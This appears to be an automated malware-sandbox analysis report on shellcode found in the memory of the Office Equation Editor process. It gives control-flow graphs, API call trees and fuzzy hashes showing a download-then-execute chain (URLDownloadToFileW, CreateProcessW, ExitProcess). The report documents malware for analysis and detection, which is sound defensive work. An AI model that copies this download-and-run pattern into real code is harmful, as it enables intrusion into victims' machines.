                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFileLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3376099886-0
                                                  • Opcode ID: 11022e197e687a2df6d0a6c112975e3d82a1bb2db2132908dc8ef749d180d3e1
                                                  • Instruction ID: 9898b77b5e2da2a49343f48e1df7173b52ee7443874066f86d4a5ef4d111896d
                                                  • Opcode Fuzzy Hash: 11022e197e687a2df6d0a6c112975e3d82a1bb2db2132908dc8ef749d180d3e1
                                                  • Instruction Fuzzy Hash: F131A16950C3C52BCB12A7B04D6ABADBF65BFD3700F08C6CEE0C60A0A3D6648505D756
                                                  Function 005AC165 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 145 5ac165-5ac170 147 5ac176-5ac1c6 145->147 148 5ac171 call 5ac1cc 145->148 156 5ac1c8-5ac1d6 URLDownloadToFileW call 5ac1e5 147->156 157 5ac1c7 147->157 148->147 160 5ac1d9-5ac1db 156->160 161 5ac22c-5ac236 CreateProcessW call 5ac23f 156->161 157->156 165 5ac1dd 160->165 166 5ac251 160->166 171 5ac288 161->171 172 5ac238 161->172 168 5ac24f-5ac250 165->168 169 5ac1df-5ac1f8 call 5ac206 165->169 170 5ac254-5ac265 call 5ac26e 166->170 168->166 191 5ac1fa-5ac1fb 169->191 192 5ac25f-5ac261 169->192 187 5ac267-5ac26b 170->187 176 5ac28a-5ac28e 171->176 177 5ac290-5ac294 171->177 174 5ac23a-5ac244 ExitProcess 172->174 175 5ac2a9-5ac2ab 172->175 179 5ac2bb-5ac2bc 175->179 176->177 182 5ac29c-5ac2a3 176->182 177->175 184 5ac296-5ac29a 177->184 185 5ac2a7 182->185 186 5ac2a5 182->186 184->175 184->182 189 5ac2ad-5ac2b6 185->189 186->175 195 5ac27a-5ac27d 189->195 193 5ac1fd-5ac1fe 191->193 194 5ac262-5ac265 191->194 192->194 196 5ac26f-5ac277 193->196 197 5ac200-5ac203 193->197 194->170 194->187 198 5ac2b8 195->198 199 5ac27f-5ac282 195->199 196->195 200 5ac25c-5ac25e call 5ac26e 197->200 201 5ac205-5ac22b 197->201 198->179 199->189 202 5ac284 199->202 200->192 201->161 202->171
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFile
                                                  • String ID:
                                                  • API String ID: 2126523932-0
                                                  • Opcode ID: ba75ab135124378094b088de7fd64711136ff93d0e74768a535ecd16e9797128
                                                  • Instruction ID: 4f66d1dc6f7d13841fe4390f2fce86902e90ae1e9ec395cb012fd40a4fc72f6b
                                                  • Opcode Fuzzy Hash: ba75ab135124378094b088de7fd64711136ff93d0e74768a535ecd16e9797128
                                                  • Instruction Fuzzy Hash: 2F216D6950C3D51BCB26A7B04CADBADBF557FD3700F08CACEE0D60A0A3D6688505D756
                                                  Function 005AC1CC Relevance: 4.6, APIs: 3, Instructions: 71filenetworkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 204 5ac1cc-5ac1ce URLDownloadToFileW 205 5ac1d5-5ac1d6 204->205 206 5ac1d0 call 5ac1e5 204->206 207 5ac1d9-5ac1db 205->207 208 5ac22c-5ac236 CreateProcessW call 5ac23f 205->208 206->205 212 5ac1dd 207->212 213 5ac251 207->213 218 5ac288 208->218 219 5ac238 208->219 215 5ac24f-5ac250 212->215 216 5ac1df-5ac1f8 call 5ac206 212->216 217 5ac254-5ac265 call 5ac26e 213->217 215->213 238 5ac1fa-5ac1fb 216->238 239 5ac25f-5ac261 216->239 234 5ac267-5ac26b 217->234 223 5ac28a-5ac28e 218->223 224 5ac290-5ac294 218->224 221 5ac23a-5ac244 ExitProcess 219->221 222 5ac2a9-5ac2ab 219->222 226 5ac2bb-5ac2bc 222->226 223->224 229 5ac29c-5ac2a3 223->229 224->222 231 5ac296-5ac29a 224->231 232 5ac2a7 229->232 233 5ac2a5 229->233 231->222 231->229 236 5ac2ad-5ac2b6 232->236 233->222 242 5ac27a-5ac27d 236->242 240 5ac1fd-5ac1fe 238->240 241 5ac262-5ac265 238->241 239->241 243 5ac26f-5ac277 240->243 244 5ac200-5ac203 240->244 241->217 241->234 245 5ac2b8 242->245 246 5ac27f-5ac282 242->246 243->242 247 5ac25c-5ac25e call 5ac26e 244->247 248 5ac205-5ac22b 244->248 245->226 246->236 249 5ac284 246->249 247->239 248->208 249->218
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(00000000,005AC176,?,00000000,00000000), ref: 005AC1CE
                                                    • Part of subcall function 005AC1E5: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                    • Part of subcall function 005AC1E5: ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateDownloadExitFile
                                                  • String ID:
                                                  • API String ID: 2126523932-0
                                                  • Opcode ID: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
                                                  • Instruction ID: 5c4311a68a954302a39b8bc1fd270e1aa797c13f4da01a9d9270e830546926ec
                                                  • Opcode Fuzzy Hash: 9180f0b284761833f9f31796fac9cfcee9c35c59c9fab4882ec9e8daa7a07ec6
                                                  • Instruction Fuzzy Hash: 1411CE7D40830126DB14E7E09D89BAEBF5ABFE7B00F548A48E1D10A157DA74CA089665
                                                  Function 005AC1E5 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 251 5ac1e5-5ac1f8 call 5ac206 256 5ac1fa-5ac1fb 251->256 257 5ac25f-5ac261 251->257 258 5ac1fd-5ac1fe 256->258 259 5ac262-5ac265 256->259 257->259 260 5ac26f-5ac277 258->260 261 5ac200-5ac203 258->261 262 5ac267-5ac26b 259->262 263 5ac254-5ac265 call 5ac26e 259->263 267 5ac27a-5ac27d 260->267 264 5ac25c-5ac25e call 5ac26e 261->264 265 5ac205-5ac236 CreateProcessW call 5ac23f 261->265 263->262 264->257 278 5ac288 265->278 282 5ac238 265->282 271 5ac2b8 267->271 272 5ac27f-5ac282 267->272 274 5ac2bb-5ac2bc 271->274 275 5ac2ad-5ac2b6 272->275 276 5ac284 272->276 275->267 276->278 280 5ac28a-5ac28e 278->280 281 5ac290-5ac294 278->281 280->281 283 5ac29c-5ac2a3 280->283 284 5ac2a9-5ac2ab 281->284 285 5ac296-5ac29a 281->285 282->284 288 5ac23a-5ac244 ExitProcess 282->288 286 5ac2a7 283->286 287 5ac2a5 283->287 284->274 285->283 285->284 286->275 287->284
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateExit
                                                  • String ID:
                                                  • API String ID: 126409537-0
                                                  • Opcode ID: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
                                                  • Instruction ID: d2b3dbc95af5d5a643b4aad1025bd1f6f729026fb1eeca9efd8e4e6d0dcf37ed
                                                  • Opcode Fuzzy Hash: fdbaa3d9f1220df4e5171d05b8988b32f4ca09a6248049512152c847acd2eb6c
                                                  • Instruction Fuzzy Hash: F111226D10834265CB20F6F09884BEEBFA5FFD7700F88CA4AE8D14A106D634C886C729
                                                  Function 005AC206 Relevance: 3.1, APIs: 2, Instructions: 56processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 291 5ac206-5ac236 CreateProcessW call 5ac23f 297 5ac288 291->297 298 5ac238 291->298 301 5ac28a-5ac28e 297->301 302 5ac290-5ac294 297->302 299 5ac23a-5ac244 ExitProcess 298->299 300 5ac2a9-5ac2ab 298->300 303 5ac2bb-5ac2bc 300->303 301->302 305 5ac29c-5ac2a3 301->305 302->300 306 5ac296-5ac29a 302->306 307 5ac2a7 305->307 308 5ac2a5 305->308 306->300 306->305 309 5ac2ad-5ac2b6 307->309 308->300 312 5ac2b8 309->312 313 5ac27f-5ac282 309->313 312->303 313->309 314 5ac284 313->314 314->297
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005AC22C
                                                    • Part of subcall function 005AC23F: ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateExit
                                                  • String ID:
                                                  • API String ID: 126409537-0
                                                  • Opcode ID: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
                                                  • Instruction ID: 2e654e9d93b0b7a83429da91cba05beff9405096ba7fc28c91de7b6e5614c697
                                                  • Opcode Fuzzy Hash: 4581ba8be27b4f40f7c6f75f124480c8923545fa759ab39b88aabc2470b18446
                                                  • Instruction Fuzzy Hash: BA01F2AD14434251DB3076E498447EE7F65BFD7710FC88E4BE8C50814AD56485C39719
                                                  Function 005AC23F Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 315 5ac23f-5ac244 ExitProcess
                                                  APIs
                                                  • ExitProcess.KERNEL32(00000000), ref: 005AC244
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction Fuzzy Hash:
                                                  Function 005AC246 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 317 5ac246-5ac24e GetPEB 318 5ac251 317->318 319 5ac254-5ac265 call 5ac26e 318->319 322 5ac267-5ac26b 319->322
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction ID: 7d329befb832e07dd2370553dfb1a8a3680961969641471f58564082ecf83e5d
                                                  • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction Fuzzy Hash: DAD052352024028FD304DF44C980E5BFB6AFFC8B10B24C268E4144BA1AD730EC92CAA0

                                                  Non-executed Functions

                                                  Function 005AC08E Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 328 5ac08e-5ac0b5 ExitProcess call 5ac0a7 call 5ac0c3 333 5ac108-5ac127 328->333 334 5ac0b8 328->334 336 5ac129-5ac132 333->336 335 5ac0ba-5ac0c0 334->335 334->336 341 5ac0c2-5ac0d1 335->341 342 5ac135-5ac142 335->342 336->342 343 5ac143-5ac14a 341->343 344 5ac0d3-5ac0d8 341->344 342->343 346 5ac14b-5ac155 LoadLibraryW call 5ac165 343->346 344->343 347 5ac0da 344->347 352 5ac156-5ac157 346->352 347->346 348 5ac0dc-5ac0e0 347->348 348->342 350 5ac0e2 348->350 350->352 353 5ac0e4-5ac105 call 5ac136 350->353 354 5ac159-5ac1c6 call 5ac1cc 352->354 355 5ac1c7 352->355 353->333 354->355 356 5ac1c8-5ac1d6 URLDownloadToFileW call 5ac1e5 354->356 355->356 365 5ac1d9-5ac1db 356->365 366 5ac22c-5ac236 CreateProcessW call 5ac23f 356->366 372 5ac1dd 365->372 373 5ac251 365->373 381 5ac288 366->381 382 5ac238 366->382 377 5ac24f-5ac250 372->377 378 5ac1df-5ac1f8 call 5ac206 372->378 380 5ac254-5ac265 call 5ac26e 373->380 377->373 402 5ac1fa-5ac1fb 378->402 403 5ac25f-5ac261 378->403 398 5ac267-5ac26b 380->398 387 5ac28a-5ac28e 381->387 388 5ac290-5ac294 381->388 385 5ac23a-5ac244 ExitProcess 382->385 386 5ac2a9-5ac2ab 382->386 390 5ac2bb-5ac2bc 386->390 387->388 393 5ac29c-5ac2a3 387->393 388->386 395 5ac296-5ac29a 388->395 396 5ac2a7 393->396 397 5ac2a5 393->397 395->386 395->393 400 5ac2ad-5ac2b6 396->400 397->386 406 5ac27a-5ac27d 400->406 404 5ac1fd-5ac1fe 402->404 405 5ac262-5ac265 402->405 403->405 407 5ac26f-5ac277 404->407 408 5ac200-5ac203 404->408 405->380 405->398 409 5ac2b8 406->409 410 5ac27f-5ac282 406->410 407->406 411 5ac25c-5ac25e call 5ac26e 408->411 412 5ac205-5ac22b 408->412 409->390 410->400 413 5ac284 410->413 411->403 412->366 413->381
                                                  APIs
                                                  • ExitProcess.KERNEL32(005AC07C), ref: 005AC08E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.355416821.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_59e000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 5e5e9c5a838522a5071c4c4388ef68339b0b40dd025a6b83306cf42350c3e337
                                                  • Instruction ID: d790b7ad193ad6bcf942ffdea38ca08ee7d1a69ea5e8d6393c62bce78389209f
                                                  • Opcode Fuzzy Hash: 5e5e9c5a838522a5071c4c4388ef68339b0b40dd025a6b83306cf42350c3e337
                                                  • Instruction Fuzzy Hash: CD21F3AAA0E7C04FD71397745EAE15CBF607E13204B1C86CFC5C14E2A3E2599A0AD386

                                                  Execution Graph

                                                  Execution Coverage:4.1%
                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                  Signature Coverage:4.8%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:57
                                                  execution_graph 99513 1023b0 99527 100000 99513->99527 99515 102461 99530 1022a0 99515->99530 99533 103490 GetPEB 99527->99533 99529 10068b 99529->99515 99531 1022a9 Sleep 99530->99531 99532 1022b7 99531->99532 99534 1034ba 99533->99534 99534->99529 99535 88568a 99542 885c18 99535->99542 99541 8856ba Mailbox 99561 8a0ff6 99542->99561 99544 885c2b 99545 8a0ff6 Mailbox 60 API calls 99544->99545 99546 88569c 99545->99546 99547 885632 99546->99547 99599 885a2f 99547->99599 99549 885643 99551 885674 99549->99551 99606 885d20 99549->99606 99612 885bda 99549->99612 99551->99541 99553 8881c1 MultiByteToWideChar 99551->99553 99554 88822e 99553->99554 99555 8881e7 99553->99555 99630 887eec 99554->99630 99557 8a0ff6 Mailbox 60 API calls 99555->99557 99558 8881fc MultiByteToWideChar 99557->99558 99629 8878ad 60 API calls 2 library calls 99558->99629 99560 888220 99560->99541 99564 8a0ffe 99561->99564 99563 8a1018 99563->99544 99564->99563 99566 8a101c std::exception::exception 99564->99566 99571 8a594c 99564->99571 99588 8a35e1 RtlDecodePointer 99564->99588 99589 8a87db RaiseException 99566->99589 99568 8a1046 99590 8a8711 59 API calls _free 99568->99590 99570 8a1058 99570->99544 99572 8a59c7 99571->99572 99576 8a5958 99571->99576 99597 8a35e1 RtlDecodePointer 99572->99597 99574 8a59cd 99598 8a8d68 59 API calls __getptd_noexit 99574->99598 99575 8a5963 99575->99576 99591 8aa3ab 59 API calls 2 library calls 99575->99591 99592 8aa408 59 API calls 8 library calls 99575->99592 99593 8a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99575->99593 99576->99575 99579 8a598b RtlAllocateHeap 99576->99579 99582 8a59b3 99576->99582 99586 8a59b1 99576->99586 99594 8a35e1 RtlDecodePointer 99576->99594 99579->99576 99580 8a59bf 99579->99580 99580->99564 99595 8a8d68 59 API calls __getptd_noexit 99582->99595 99596 8a8d68 59 API calls __getptd_noexit 99586->99596 99588->99564 99589->99568 99590->99570 99591->99575 99592->99575 99594->99576 99595->99586 99596->99580 99597->99574 99598->99580 99600 885a40 99599->99600 99601 8be065 99599->99601 99600->99549 99621 8d6443 60 API calls Mailbox 99601->99621 99603 8be06f 99604 8a0ff6 Mailbox 60 API calls 99603->99604 99605 8be07b 99604->99605 99607 885d2e 99606->99607 99608 885d93 99606->99608 99610 885d56 99607->99610 99611 885d66 ReadFile 99607->99611 99622 885dae SetFilePointerEx 99608->99622 99610->99549 99611->99607 99611->99610 99613 885bee 99612->99613 99614 8be117 99612->99614 99623 885b19 99613->99623 99628 8d6443 60 API calls Mailbox 99614->99628 99617 885bfa 99617->99549 99618 8be122 99619 8a0ff6 Mailbox 60 API calls 99618->99619 99620 8be137 _memmove 99619->99620 99621->99603 99622->99607 99624 885b31 99623->99624 99627 885b2a _memmove 99623->99627 99625 8a0ff6 Mailbox 60 API calls 99624->99625 99626 8be0a7 99624->99626 99625->99627 99627->99617 99628->99618 99629->99560 99631 887ef9 99630->99631 99632 887f06 99630->99632 99631->99560 99633 8a0ff6 Mailbox 60 API calls 99632->99633 99633->99631 99634 8c220e GetTempPathW 99635 8c222b 99634->99635 99636 88e70b 99639 88d260 99636->99639 99638 88e719 99640 88d27d 99639->99640 99668 88d4dd 99639->99668 99641 8c2b0a 99640->99641 99642 8c2abb 99640->99642 99671 88d2a4 99640->99671 99723 8fa6fb 332 API calls __cinit 99641->99723 99645 8c2abe 99642->99645 99650 8c2ad9 99642->99650 99646 8c2aca 99645->99646 99645->99671 99721 8fad0f 332 API calls 99646->99721 99650->99668 99722 8fb1b7 332 API calls 3 library calls 99650->99722 99651 88d594 99716 888bb2 69 API calls 99651->99716 99652 8c2cdf 99652->99652 99653 88d6ab 99653->99638 99657 88d5a3 99657->99638 99658 8c2c26 99731 8faa66 90 API calls 99658->99731 99668->99653 99732 8ea0b5 90 API calls 4 library calls 99668->99732 99671->99651 99671->99653 99671->99658 99671->99668 99673 88a000 99671->99673 99696 889f3a 99671->99696 99701 8a2f80 99671->99701 99704 8888a0 99671->99704 99711 8886a2 69 API calls 99671->99711 99712 888620 99671->99712 99717 88859a 69 API calls 99671->99717 99718 88d0dc 332 API calls 99671->99718 99719 88d060 90 API calls 99671->99719 99720 88cedd 332 API calls 99671->99720 99724 888bb2 69 API calls 99671->99724 99725 889e9c 61 API calls Mailbox 99671->99725 99726 8d6d03 61 API calls 99671->99726 99727 8881a7 99671->99727 99674 88a01f 99673->99674 99691 88a04d Mailbox 99673->99691 99675 8a0ff6 Mailbox 60 API calls 99674->99675 99675->99691 99676 88b5d5 99677 8881a7 60 API calls 99676->99677 99690 88a1b7 99677->99690 99678 8a0ff6 60 API calls Mailbox 99678->99691 99679 8877c7 60 API calls 99679->99691 99682 8881a7 60 API calls 99682->99691 99683 8a2f80 68 API calls __cinit 99683->99691 99685 8c047f 99735 8ea0b5 90 API calls 4 library calls 99685->99735 99688 8c048e 99688->99671 99689 8d7405 60 API calls 99689->99691 99690->99671 99691->99676 99691->99678 99691->99679 99691->99682 99691->99683 99691->99685 99691->99689 99691->99690 99692 8c0e00 99691->99692 99694 88a6ba 99691->99694 99695 88b5da 99691->99695 99733 88ca20 332 API calls 2 library calls 99691->99733 99734 88ba60 61 API calls Mailbox 99691->99734 99737 8ea0b5 90 API calls 4 library calls 99692->99737 99736 8ea0b5 90 API calls 4 library calls 99694->99736 99738 8ea0b5 90 API calls 4 library calls 99695->99738 99697 8a0ff6 Mailbox 60 API calls 99696->99697 99698 889f47 99697->99698 99699 889f56 99698->99699 99739 887f41 99698->99739 99699->99671 99743 8a2e84 99701->99743 99703 8a2f8b 99703->99671 99705 888a81 99704->99705 99706 8888b3 99704->99706 99705->99671 99710 8888c4 99706->99710 99823 8877c7 99706->99823 99709 8a2f80 __cinit 68 API calls 99709->99710 99710->99671 99711->99671 99713 88862b 99712->99713 99715 888652 99713->99715 99828 888b13 99713->99828 99715->99671 99716->99657 99717->99671 99718->99671 99719->99671 99720->99671 99721->99653 99722->99668 99723->99671 99724->99671 99725->99671 99726->99671 99728 8881ba 99727->99728 99729 8881b2 99727->99729 99728->99671 99847 8880d7 60 API calls 2 library calls 99729->99847 99731->99668 99732->99652 99733->99691 99734->99691 99735->99688 99736->99690 99737->99695 99738->99690 99740 887f50 __wsetenvp _memmove 99739->99740 99741 8a0ff6 Mailbox 60 API calls 99740->99741 99742 887f8e 99741->99742 99742->99699 99744 8a2e90 __alloc_osfhnd 99743->99744 99751 8a3457 99744->99751 99750 8a2eb7 __alloc_osfhnd 99750->99703 99768 8a9e4b 99751->99768 99753 8a2e99 99754 8a2ec8 RtlDecodePointer RtlDecodePointer 99753->99754 99755 8a2ea5 99754->99755 99756 8a2ef5 99754->99756 99765 8a2ec2 99755->99765 99756->99755 99816 8a89e4 60 API calls __cftog_l 99756->99816 99758 8a2f58 RtlEncodePointer RtlEncodePointer 99758->99755 99759 8a2f2c 99759->99755 99763 8a2f46 RtlEncodePointer 99759->99763 99818 8a8aa4 62 API calls __realloc_crt 99759->99818 99760 8a2f07 99760->99758 99760->99759 99817 8a8aa4 62 API calls __realloc_crt 99760->99817 99763->99758 99764 8a2f40 99764->99755 99764->99763 99819 8a3460 99765->99819 99769 8a9e6f RtlEnterCriticalSection 99768->99769 99770 8a9e5c 99768->99770 99769->99753 99775 8a9ed3 99770->99775 99772 8a9e62 99772->99769 99799 8a32f5 59 API calls 3 library calls 99772->99799 99776 8a9edf __alloc_osfhnd 99775->99776 99777 8a9ee8 99776->99777 99778 8a9f00 99776->99778 99800 8aa3ab 59 API calls 2 library calls 99777->99800 99791 8a9f21 __alloc_osfhnd 99778->99791 99803 8a8a5d 59 API calls 2 library calls 99778->99803 99781 8a9eed 99801 8aa408 59 API calls 8 library calls 99781->99801 99782 8a9f15 99784 8a9f2b 99782->99784 99785 8a9f1c 99782->99785 99789 8a9e4b __lock 59 API calls 99784->99789 99804 8a8d68 59 API calls __getptd_noexit 99785->99804 99786 8a9ef4 99802 8a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99786->99802 99792 8a9f32 99789->99792 99791->99772 99793 8a9f3f 99792->99793 99794 8a9f57 99792->99794 99805 8aa06b 99793->99805 99808 8a2f95 99794->99808 99797 8a9f4b 99814 8a9f73 RtlLeaveCriticalSection _doexit 99797->99814 99800->99781 99801->99786 99803->99782 99804->99791 99806 8aa07b InitializeCriticalSectionEx 99805->99806 99807 8aa088 InitializeCriticalSectionAndSpinCount 99805->99807 99806->99797 99807->99797 99809 8a2fc7 __dosmaperr 99808->99809 99810 8a2f9e HeapFree 99808->99810 99809->99797 99810->99809 99811 8a2fb3 99810->99811 99815 8a8d68 59 API calls __getptd_noexit 99811->99815 99813 8a2fb9 GetLastError 99813->99809 99814->99791 99815->99813 99816->99760 99817->99759 99818->99764 99822 8a9fb5 RtlLeaveCriticalSection 99819->99822 99821 8a2ec7 99821->99750 99822->99821 99824 8a0ff6 Mailbox 60 API calls 99823->99824 99825 8877e8 99824->99825 99826 8a0ff6 Mailbox 60 API calls 99825->99826 99827 8877f6 99826->99827 99827->99709 99829 8888a0 69 API calls 99828->99829 99830 888b23 99829->99830 99831 888b9d 99830->99831 99832 888b2d 99830->99832 99846 889e9c 61 API calls Mailbox 99831->99846 99833 8a0ff6 Mailbox 60 API calls 99832->99833 99835 888b3e 99833->99835 99837 888b4c 99835->99837 99838 8877c7 60 API calls 99835->99838 99836 888b8d 99836->99715 99839 888b5b 99837->99839 99844 8880d7 60 API calls 2 library calls 99837->99844 99838->99837 99841 8a0ff6 Mailbox 60 API calls 99839->99841 99842 888b65 99841->99842 99845 8887c0 69 API calls 99842->99845 99844->99839 99845->99836 99846->99836 99847->99728 99848 88b56e 99855 89fb84 99848->99855 99850 88b584 99864 88c707 99850->99864 99852 88b5ac 99854 88a4e8 99852->99854 99876 8ea0b5 90 API calls 4 library calls 99852->99876 99856 89fb90 99855->99856 99857 89fba2 99855->99857 99877 889e9c 61 API calls Mailbox 99856->99877 99859 89fba8 99857->99859 99860 89fbd1 99857->99860 99862 8a0ff6 Mailbox 60 API calls 99859->99862 99878 889e9c 61 API calls Mailbox 99860->99878 99863 89fb9a 99862->99863 99863->99850 99866 88c72c _wcscmp 99864->99866 99879 887b76 99864->99879 99867 88c760 Mailbox 99866->99867 99868 887f41 60 API calls 99866->99868 99867->99852 99867->99867 99869 8c1abb 99868->99869 99884 887c8e 99869->99884 99873 8c1ad7 99875 8c1adb Mailbox 99873->99875 99894 889e9c 61 API calls Mailbox 99873->99894 99875->99852 99876->99854 99877->99863 99878->99863 99880 8a0ff6 Mailbox 60 API calls 99879->99880 99881 887b9b 99880->99881 99895 888189 99881->99895 99885 887ca0 99884->99885 99886 8bf094 99884->99886 99898 887bb1 99885->99898 99904 8d8123 60 API calls _memmove 99886->99904 99889 8bf09e 99891 8881a7 60 API calls 99889->99891 99890 887cac 99893 88859a 69 API calls 99890->99893 99892 8bf0a6 Mailbox 99891->99892 99893->99873 99894->99875 99896 8a0ff6 Mailbox 60 API calls 99895->99896 99897 887baa 99896->99897 99897->99866 99899 887bbf 99898->99899 99903 887be5 _memmove 99898->99903 99900 8a0ff6 Mailbox 60 API calls 99899->99900 99899->99903 99901 887c34 99900->99901 99902 8a0ff6 Mailbox 60 API calls 99901->99902 99902->99903 99903->99890 99904->99889 99905 99f090 99906 99f0a0 99905->99906 99907 99f1ba LoadLibraryA 99906->99907 99911 99f1ff VirtualProtect VirtualProtect 99906->99911 99908 99f1d1 99907->99908 99908->99906 99910 99f1e3 GetProcAddress 99908->99910 99910->99908 99913 99f1f9 ExitProcess 99910->99913 99912 99f264 99911->99912 99912->99912 99914 8c0226 99920 88ade2 Mailbox 99914->99920 99916 8c0c86 100044 8d66f4 99916->100044 99918 8c0c8f 99920->99916 99920->99918 99921 8c00e0 VariantClear 99920->99921 99922 88b6c1 99920->99922 99930 8fe24b 99920->99930 99933 8fe237 99920->99933 99936 8ed2e6 99920->99936 99983 8f474d 99920->99983 99992 892123 99920->99992 100032 885906 99920->100032 100041 889df0 60 API calls Mailbox 99920->100041 100042 8d7405 60 API calls 99920->100042 99921->99920 100043 8ea0b5 90 API calls 4 library calls 99922->100043 100047 8fcdf1 99930->100047 99932 8fe25b 99932->99920 99934 8fcdf1 131 API calls 99933->99934 99935 8fe247 99934->99935 99935->99920 99937 8ed310 99936->99937 99938 8ed305 99936->99938 99942 8877c7 60 API calls 99937->99942 99981 8ed3ea Mailbox 99937->99981 100213 889c9c 60 API calls 99938->100213 99940 8a0ff6 Mailbox 60 API calls 99941 8ed433 99940->99941 99943 8ed43f 99941->99943 99946 885906 61 API calls 99941->99946 99944 8ed334 99942->99944 99948 889997 85 API calls 99943->99948 99945 8877c7 60 API calls 99944->99945 99947 8ed33d 99945->99947 99946->99943 99950 889997 85 API calls 99947->99950 99949 8ed457 99948->99949 100200 885956 99949->100200 99952 8ed349 99950->99952 100214 8846f9 99952->100214 99955 8ed49e 99960 8ed4c9 99955->99960 99961 8ed500 99955->99961 99956 8ed46a GetLastError 99958 8ed483 99956->99958 99957 8ed35e 99959 887c8e 60 API calls 99957->99959 99964 8ed3f3 Mailbox 99958->99964 100270 885a1a CloseHandle 99958->100270 99962 8ed391 99959->99962 99963 8a0ff6 Mailbox 60 API calls 99960->99963 99966 8a0ff6 Mailbox 60 API calls 99961->99966 99965 8ed3e3 99962->99965 100265 8e3e73 99962->100265 99967 8ed4ce 99963->99967 99964->99920 100269 889c9c 60 API calls 99965->100269 99972 8ed505 99966->99972 99973 8877c7 60 API calls 99967->99973 99974 8ed4df 99967->99974 99972->99964 99976 8877c7 60 API calls 99972->99976 99973->99974 100271 8ef835 60 API calls 2 library calls 99974->100271 99975 8ed3a5 99978 887f41 